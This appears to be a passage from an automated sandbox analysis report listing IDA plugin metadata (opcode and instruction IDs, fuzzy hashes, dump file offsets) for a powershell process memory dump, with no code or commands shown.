                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 289b6b4fe672dc3b3edb56cfa9e3712d571b429774a3cb660767da585684de3d
                                                                                                                                                                                                                  • Instruction ID: f39ac4ec5509faacd9965cccec55dc8d09d1f3f871a00aa97b4959a804e48ad4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 289b6b4fe672dc3b3edb56cfa9e3712d571b429774a3cb660767da585684de3d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2A1DE31E1D91A4FFBA9A76898253B962D2EFD8790F4540BAD40EC32C6DF2CB8024345
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: aa3d543be783615fec6ad8f187553011046f835a8b20fc3c9cf92be313e7102c
                                                                                                                                                                                                                  • Instruction ID: d155f438b5f71170ef90cdd307e15147bfbff50e0fd14321643f258059a3c7b8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa3d543be783615fec6ad8f187553011046f835a8b20fc3c9cf92be313e7102c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8715B31F18D1A5FEA94FBB894156BD63D2EFA8790F504276D01EC32D6DF28A8428385
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: ee81ccec112cac82ee31bce922ae947da493433d6f03a3c8e3bff0b7c8b40248
                                                                                                                                                                                                                  • Instruction ID: 03d841f35852d082d5cbd634128d4d60624c8fe6395cab737cc950d37a85a3d3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee81ccec112cac82ee31bce922ae947da493433d6f03a3c8e3bff0b7c8b40248
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3051D43060DA894FD7A4EF6CD458A657BE1FF89311B0900ABE489C72B2DB24EC85C791
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 16a3f59a519e3d713dc3c5e9c9872a828d197203da010410389a2ef978cef4cf
                                                                                                                                                                                                                  • Instruction ID: 9e2b7196af2245c50de47de2fb186aefa96904583d9560c0530d36c4cc8bdc60
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16a3f59a519e3d713dc3c5e9c9872a828d197203da010410389a2ef978cef4cf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5351C331B0D9184FDB59FB28D8557B973E2EFA9340F0001BAD84ED7296DE28AC468781
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                  • Instruction ID: ab8ebb97966f62f9fbf2b4ecb1128617bb6995c144de80058d97f800824b33ed
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F41E63131981C8FDA94EB1CE898E6877E1FF6831275505E6E44ACB271DA26DC81CB40
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 656292e4843b3c2cd9bc9505552dff75d930e5bca72f72748c16946f4ef94ab7
                                                                                                                                                                                                                  • Instruction ID: 0e925ae308c70eb2732817668c1f5ba42e475702d19fc65ee5a1d287f615878e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 656292e4843b3c2cd9bc9505552dff75d930e5bca72f72748c16946f4ef94ab7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A418231E0C91E8FE798EB2894553BE76E2EF98390F01017AD40DD32C5DF286C424795
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 6952b7c49aeafb59b7176c22844ac945d8639c9769ab6dbcc441bb3218b8a931
                                                                                                                                                                                                                  • Instruction ID: 0b334257d1aedb4f26afef3d7d322d451f5692efa18849efeee6de3029b1f537
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6952b7c49aeafb59b7176c22844ac945d8639c9769ab6dbcc441bb3218b8a931
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39416E31E0C90E8FEBA8EB6894053B977E1EF58390F10057AE40DD32C6DF296C968785
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 8abae7e12b7845c03abd7ff7ea8f8968c0c6ee297c2af7842c04f0b7cc059ce3
                                                                                                                                                                                                                  • Instruction ID: 4465c67ab1ffedecfa924119479dcb88bbf1231197f42753916adae83ea1602b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8abae7e12b7845c03abd7ff7ea8f8968c0c6ee297c2af7842c04f0b7cc059ce3
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F414931B1CA054FE798B73CA8496B67BD1DFA92A0F14017BD40DC36D2DE1DA8428399
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: d656e19512c3cbb5e15c53a8cb2981f6e660de89ccd1037b4fa9f020fbf9a8e5
                                                                                                                                                                                                                  • Instruction ID: 7f226c3f87be7f5ae375078554e450560945c465688779310dcd08b1dffef9bc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d656e19512c3cbb5e15c53a8cb2981f6e660de89ccd1037b4fa9f020fbf9a8e5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08319C30A1DA494FEB98EB28D854B7577D2EF99390F6441BAD00EC72D2DE1DAC82C744
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 206002204e8a2f6b7516e39b9d018d1597f4490648361f8c697f2f6b25c31d63
                                                                                                                                                                                                                  • Instruction ID: 8f70dada2bcbc241366f47264ea6caf808c3f82e2cef726a08b3a75dc55af6d9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 206002204e8a2f6b7516e39b9d018d1597f4490648361f8c697f2f6b25c31d63
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C315E3190C91E8FEB98FB58A4467FE77E1EF98391F00013AE40DD32C1DF2968958695
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 671cd7f88cb0cb739b6d7c608bac8a9bb072e3bc6a2ac450403ae0db64e00b04
                                                                                                                                                                                                                  • Instruction ID: c39e7b76f1cce3049481ad37cdd920842d6fbb63283fef9cd43bb2ddaec0b6f7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 671cd7f88cb0cb739b6d7c608bac8a9bb072e3bc6a2ac450403ae0db64e00b04
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3219537B1E5995ED60177BDBC524EA3B74DE832B6B0801B7D18CCA093D61D508AC2E6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: c8a6bef381fbf82acaead7ec98824f872f36732513bf574f678302bdb934ba06
                                                                                                                                                                                                                  • Instruction ID: 9ac514a33ff8809a2b5d653078fc7ce70c2047e4c5977bbddb33db1fb0c368cc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8a6bef381fbf82acaead7ec98824f872f36732513bf574f678302bdb934ba06
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621A430B1CA494FE794B73898562B97BD1EBA8290F1405BFD44ED36D2DE19A8424345
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: cd0a0a15e30b94247907876da4bf20c6dbe7f61473dc75ae9a55beda31eb6690
                                                                                                                                                                                                                  • Instruction ID: 0805f52febbe6622649cfde0e85b7f13a749ee255e5878c91e631f76bf8e2f3d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd0a0a15e30b94247907876da4bf20c6dbe7f61473dc75ae9a55beda31eb6690
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48114931628D0D8FCA98FB6CD48496573E2FBA8315745057EE48AC7AA1CB25FC41CB44
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a5a59211ccb7e358479c2b5e08e39243ea6e2087e5821af812afb48c496c1aa4
                                                                                                                                                                                                                  • Instruction ID: b34fa9e26207dfd8f057d8dbf526a88158a9f12811a24396c04760a1b223b431
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a59211ccb7e358479c2b5e08e39243ea6e2087e5821af812afb48c496c1aa4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97118F3121D9888FD795EB3CE8989647FE1EF6A35275A04F7E089CB1B2EA15DC80C740
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: a1440505b1d9d7f03709dd6519a569a02604a999856809f727f64957ba1f9ee5
                                                                                                                                                                                                                  • Instruction ID: ee913bc7e5392c43ed8f69dd7d1e8ee6c46e5eec9f89c272fc6bda1760c4c4bc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1440505b1d9d7f03709dd6519a569a02604a999856809f727f64957ba1f9ee5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C012972F1CA094FE658AA4C78022B973C2E7C9661F04027FE48ED3282DE256843068A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 349b71b71ce8ecb4068fdfc6c7fe1950fbfbb66d78cebfd02c9c4511c7045d0a
                                                                                                                                                                                                                  • Instruction ID: 427a1e908184e3f848d33ad968f56167ef357708cb5d880a5cf39878e226bd59
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 349b71b71ce8ecb4068fdfc6c7fe1950fbfbb66d78cebfd02c9c4511c7045d0a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5014C72F1CA084FE658AA5C78072B973C2E7C9661F05023FE08ED3282DE25685306CA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 88113b4f9d03ddc13af950b9871ce7167a054f356720f06828a9adb2c18281c4
                                                                                                                                                                                                                  • Instruction ID: 814377969ad6be3d860f2bb93d2e43ad48facf7d72e02222a06416bb81a21e7f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88113b4f9d03ddc13af950b9871ce7167a054f356720f06828a9adb2c18281c4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B014C72F1CA094FE658AA5C78072B973C2E7C9661F05023FE18ED3282DE25680306CA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 0c79de0656d00002c3183ad526002c7a7ec91c7593def5820b79ba5e499fb7ef
                                                                                                                                                                                                                  • Instruction ID: 8e7a8b0431ffc905dd7dd3327c199ee35964912a00504851ace92682f5941aca
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c79de0656d00002c3183ad526002c7a7ec91c7593def5820b79ba5e499fb7ef
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB214F3061DA894FDB96EB28C454F61BBE1EF55344F5840EAD44ECB2E2CB29EC81CB41
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                  • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000011.00000002.3397977228.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 692b4e0f6599d51f7bfbfa6a4089735caf49be3725608a3c0b7de35117d6956a
                                                                                                                                                                                                                  • Instruction ID: 0fe869cac74e083e3c2675aeb44b06de289f0421e966f72654b7bb07c527c6a7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 692b4e0f6599d51f7bfbfa6a4089735caf49be3725608a3c0b7de35117d6956a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF02236E0CD4D4AEB10AB78BC149E8BBD0FF89364F04007AE40CC32D1D76A5845C285